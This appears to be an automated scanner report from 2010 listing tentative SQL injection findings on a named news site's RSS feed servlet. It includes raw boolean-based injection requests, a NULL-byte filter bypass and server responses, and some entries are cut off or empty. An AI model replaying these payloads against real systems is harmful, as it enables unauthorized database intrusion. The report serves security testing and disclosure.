SQL Injection, feeds.mercurynews.com

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200125.xml [REST URL parameter 3] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200125.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200125.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:18:26 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200125.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:18:26 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.2. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200222.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200222.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200222.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:07 GMT
Date: Tue, 07 Dec 2010 23:20:07 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200222.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:08 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.3. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200222.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200222.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 67192433%20or%201%3d1--%20 and 67192433%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56867192433%20or%201%3d1--%20/200222.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:18 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/56867192433%20or%201%3d2--%20/200222.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:19 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.4. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200224.xml [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200224.xml

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss'%20and%201%3d1--%20/CustomRssServlet/568/200224.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:38 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss'%20and%201%3d2--%20/CustomRssServlet/568/200224.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Location: http://origin.feeds.mercurynews.com/defaultError.jhtml
Date: Tue, 07 Dec 2010 23:20:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>

1.5. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200224.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200224.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet%00'/568/200224.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:20:39 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet%00''/568/200224.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.6. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200729.xml [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200729.xml

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 18085221%20or%201%3d1--%20 and 18085221%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568/200729.xml?118085221%20or%201%3d1--%20=1 HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Date: Tue, 07 Dec 2010 23:21:37 GMT
Content-Length: 23879
Connection: close
X-N: S

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...
<enclosure url="http://extras.mnginteractive.com/live/media/site568/2010/1111/20101111__quakes~1.JPG"
length="154740"
type="image/pjpeg"/>
</item>
<item>
<title><![CDATA[Quakes owner: New stadium in about two years]]></title>
<link><![CDATA[http://www.mercurynews.com/earthquakes/ci_16590945?source=rss]]></link>
<guid><![CDATA[http://www.mercurynews.com/earthquakes/ci_16590945?source=rss]]></guid>
<description><![CDATA[The San Jose Earthquakes hope to open a 15,000-seat soccer stadium in 2012, and no later than 2013, owner Lew Wolff said in an interview this week.]]></description>
<dc:creator><p class="bylinejb">By Elliott Almond<br /></p><p class="bylineaffiliation"><a href='mailto:ealmond@mercurynews.com'>ealmond@mercurynews.com</a></dc:creator>
<pubDate><![CDATA[Thu, 11 Nov 2010 22:07:45 PST]]></pubDate>
</item>
<item>
<title><![CDATA[San Jose Earthquakes' Bobby Convey named MLS Comeback Player of Year]]></title>
<link><![CDATA[http://www.mercurynews.com/earthquakes/ci_16578286?source=rss]]></link>
<guid><![CDATA[http://www.mercurynews.com/earthquakes/ci_16578286?source=rss]]></guid>
<description><![CDATA[Midfielder had career-high 10 assists in helping Earthquakes reach playoffs after injuries limited him to one goal and two assists in 2009.]]></description>
<dc:creator><p class="bylinejb">By Elliott Almond<br /></p><p class="bylineaffiliation"><a href='mailto:ealmond@mercurynews.com'>ealmond@mercurynews.com</a></dc:creator>
<pubDate><![CDATA[Thu, 11 Nov 2010 05:44:58 PST]]></pubDate>
<enclosure url="http://extras.mnginteractive.com/live/media/site568/2010/1110/20101110_081624_convey.jpg"
length="36852"
type="image/pjpeg"/>
</item>
<item>
<title><![CDATA[San Jose Earthquakes gets bullied at home in playoffs by New York]]></title
...[SNIP]...

Request 2

GET /mngi/rss/CustomRssServlet/568/200729.xml?118085221%20or%201%3d2--%20=1 HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Date: Tue, 07 Dec 2010 23:21:41 GMT
Content-Length: 23889
Connection: close
X-N: S

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...
<enclosure url="http://extras.mnginteractive.com/live/media/site568/2010/1104/20101104_091315_11.4.quakeslisting.jpg"
length="0"
type="image/jpeg"/>
</item>
<item>
<title><![CDATA[Quakes owner: New stadium in about two years]]></title>
<link><![CDATA[http://www.mercurynews.com/earthquakes/ci_16590945?source=rss]]></link>
<guid><![CDATA[http://www.mercurynews.com/earthquakes/ci_16590945?source=rss]]></guid>
<description><![CDATA[The San Jose Earthquakes hope to open a 15,000-seat soccer stadium in 2012, and no later than 2013, owner Lew Wolff said in an interview this week.]]></description>
<dc:creator><p class="bylinejb">By Elliott Almond<br /></p><p class="bylineaffiliation"><a href='mailto:ealmond@mercurynews.com'>ealmond@mercurynews.com</a></dc:creator>
<pubDate><![CDATA[Thu, 11 Nov 2010 22:07:45 PST]]></pubDate>
</item>
<item>
<title><![CDATA[San Jose Earthquakes' Bobby Convey named MLS Comeback Player of Year]]></title>
<link><![CDATA[http://www.mercurynews.com/earthquakes/ci_16578286?source=rss]]></link>
<guid><![CDATA[http://www.mercurynews.com/earthquakes/ci_16578286?source=rss]]></guid>
<description><![CDATA[Midfielder had career-high 10 assists in helping Earthquakes reach playoffs after injuries limited him to one goal and two assists in 2009.]]></description>
<dc:creator><p class="bylinejb">By Elliott Almond<br /></p><p class="bylineaffiliation"><a href='mailto:ealmond@mercurynews.com'>ealmond@mercurynews.com</a></dc:creator>
<pubDate><![CDATA[Thu, 11 Nov 2010 05:44:58 PST]]></pubDate>
<enclosure url="http://extras.mnginteractive.com/live/media/site568/2010/1110/20101110_081624_convey.jpg"
length="36852"
type="image/pjpeg"/>
</item>
<item>
<title><![CDATA[San Jose Earthquakes gets bullied at home in playoffs by New York
...[SNIP]...

1.7. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200733.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200733.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200733.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200733.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:07 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.8. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200736.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200736.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 55498630%20or%201%3d1--%20 and 55498630%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56855498630%20or%201%3d1--%20/200736.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:18:33 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56855498630%20or%201%3d2--%20/200736.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.9. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200738.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200738.xml

Issue detail

Request 1

GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200738.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:18:41 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
